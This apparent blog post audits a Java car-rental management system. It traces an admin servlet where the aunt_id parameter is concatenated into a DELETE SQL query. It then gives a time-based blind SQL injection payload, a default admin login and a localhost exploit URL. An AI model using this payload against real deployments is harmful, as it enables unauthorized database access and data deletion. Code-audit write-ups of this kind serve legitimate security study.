java 审计漏洞函数,某租车系统Java代码审计之后台注入漏洞

最新推荐文章于 2023-12-28 21:58:11 发布

一只咖啡狗的自白

最新推荐文章于 2023-12-28 21:58:11 发布

阅读量173

点赞数

文章标签： java 审计漏洞函数

CMS简介

系统基于租车业务场景而搭建的O2O服务平台，可为用户提供商务租车、接送机、旅游租车、企业租车、自驾租车、婚庆用车等自助租车服务。

系统包含车辆库管理、门店管理、员工管理、司机管理、订单管理、活动管理、评价管理、财务管理、统计等。

部署简介

1、下载代码文件，可以本机调试或上传到自己服务器运行。

2、安装运行程序：

(1)将解压文件夹中的opencarrun安装包复制到tomcat–>webapps–> 下；

(2)将sql导入mysql；

(3)启动tomcat；

3、开发包安装

打开MyEclipse–>File–>Import–>选择Existing Porjects into Workspace–>Next–>Select root directory 选择刚才解压的开发包文件中的opencar–>Finish

sql审计过程

漏洞位置：

WebRoot\WEB-INF\lib\car-weishang-1.0.jar!\com\weishang\my\admin\DeleteAunt.class

功能模块：删除外聘员工

public voiddoGet(HttpServletRequest request,HttpServletResponse response)throwsServletException, IOException {

response.setContentType("text/html;charset=UTF-8");

PrintWriter out =response.getWriter();

ShopService ss =newShopService();

HttpSession session = request.getSession(true);

Object user = session.getAttribute("user");

Locale loc =newLocale("zh","CN");

ResourceBundle rb =ResourceBundle.getBundle("messages", loc);

String adminTip = rb.getString("adminTip");

String json ="";if(user==null) {

RequestDispatcher rd =request.getRequestDispatcher("/WEB-INF/jsp/login.jsp");

request.setAttribute("tip", adminTip);

rd.forward(request, response);

}else{String[] auntIds = request.getParameterValues("aunt_id");String ids ="";for(inti =0; i < auntIds.length; ++i) {

ids = ids + auntIds[i] +",";

}

ids = ids.substring(0, ids.length() -1);String flag = ss.deleteAunt(ids);

if(flag.equals("ok")) {

json ="{\"tip\":\""+ rb.getString("delete") + rb.getString("success") +"\"}";

}else{

json ="{\"tip\":\""+ rb.getString("delete") + rb.getString("failure") +"\"}";

}

out.print(json);

}

request.getParameterValues(“aunt_id”) 获取获取用户值，赋值给字符串数组变量 aunt_id, aunt_id经过处理交给ids变量,而ids变量进入deleteAunt方法，这里通过flag变量判断执行是否成功，这样只可能存在盲注了，跟进去：

deleteAunt

方法位于

/WebRoot/WEB-INF/lib/car-weishang-1.0.jar!/com/weishang/my/service/ShopService.class

publicString deleteAunt(String ids) {

String sql ="delete from aunt where aunt_id in ("+ ids +")";intflag =this.jdbc.executeUpdate(sql);this.jdbc.close();returnflag >0?"ok":"bad";

}

从这个方法看是一个执行删除操作，变量ids，也就是我们问题参数直接被拼接到sql语句中，未做编译，未做任何过滤，从而造成注入漏洞，

String sql =”delete from aunt where aunt_id in (“+ ids +”)”; 如果让这条sql执行，我们构造payload需要做一个闭合，构造如下：

delete from aunt where aunt_id in (1) AND (SELECT 7119 FROM (SELECT(SLEEP(5)))uQYd) AND (8738=8738

漏洞利用过程

默认账号：adimin 默认密码：zft3285497

进入后：

访问删除外聘员工模块

http://127.0.0.1:8081/admin/deleteAunt?aunt_id=1

) AND (SELECT 7119 FROM (SELECT(SLEEP(5)))uQYd) AND (8738=8738

一只咖啡狗的自白

关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
java 审计漏洞函数,某租车系统Java代码审计之后台注入漏洞

CMS简介系统基于租车业务场景而搭建的O2O服务平台，可为用户提供商务租车、接送机、旅游租车、企业租车、自驾租车、婚庆用车等自助租车服务。系统包含车辆库管理、门店管理、员工管理、司机管理、订单管理、活动管理、评价管理、财务管理、统计等。部署简介1、下载代码文件，可以本机调试或上传到自己服务器运行。2、安装运行程序：(1)将解压文件夹中的opencarrun安装包复制到tomcat–>we...
复制链接

扫一扫